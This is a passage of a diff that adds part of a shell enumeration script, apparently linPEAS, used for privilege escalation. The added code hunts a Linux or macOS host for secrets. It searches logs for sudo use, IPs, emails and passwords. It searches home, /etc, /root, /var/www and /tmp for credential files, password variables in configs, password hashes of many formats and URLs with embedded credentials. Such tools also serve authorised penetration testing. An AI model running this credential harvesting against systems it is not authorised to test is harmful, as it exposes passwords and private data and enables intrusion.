+aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g"
+find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
+echo ""
+
+##-- IF) IPs inside logs
+print_2title "Finding IPs inside logs (limit 70)"
+(find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70
+echo ""
+
+##-- IF) Passwords inside logs
+print_2title "Finding passwords inside logs (limit 70)"
+(find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
+echo ""
+
+##-- IF) Emails inside logs
+print_2title "Finding emails inside logs (limit 70)"
+(find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
+echo ""
+
+##-- IF) Passwords files in home
+print_2title "Finding *password* or *credential* files in home (limit 70)"
+(printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
+echo ""
+
+if ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
+ ##-- IF) Find possible files with passwords
+ print_2title "Finding passwords inside key folders (limit 70) - only PHP files"
+ intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null)
+ printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
+ echo ""
+
+ print_2title "Finding passwords inside key folders (limit 70) - no PHP files"
+ printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
+ echo ""
+
+ ##-- IF) Find possible files with passwords
+ print_2title "Finding possible password variables inside key folders (limit 140)"
+ timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
+ 
timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
+ echo ""
+
+ ##-- IF) Find possible conf files with passwords
+ print_2title "Finding possible password in config files"
+ ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" -name "*.yml" -name "*.yaml" 2>/dev/null)
+ printf "%s\n" "$ppicf" | while read f; do
+ if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then
+ echo "$ITALIC $f$NC"
+ grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
+ fi
+ done
+ echo ""
+
+ ##-- IF) Find possible files with usernames
+ print_2title "Finding 'username' string inside key folders (limit 70)"
+ timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
+ timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v 
"#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
+ echo ""
+
+ ##-- IF) Specific hashes inside files
+ print_2title "Searching specific hashes inside files - less false positives (limit 70)"
+ regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*'
+ regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}'
+ regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}'
+ regexwp='\$P\$[a-zA-Z0-9_/\.]{31}'
+ regexdrupal='\$S\$[a-zA-Z0-9_/\.]{52}'
+ regexlinuxmd5='\$1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
+ regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
+ regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}'
+ regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}'
+ timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED},"
+ echo ""
+fi
+
+if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
+ ##-- IF) Specific hashes inside files
+ print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)"
+ regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)'
+ regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)'
+ regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)'
+ regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)'
+ timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m,"
+ echo ""
+fi
+
+if ! [ "$SUPERFAST" ] && ! 
[ "$FAST" ]; then
+ ##-- IF) Find URIs with user:password@hoststrings
+ print_2title "Finding URIs with user:password@host inside key folders"
+ timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
+ echo ""
+fi
+fi
+echo''
+echo''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi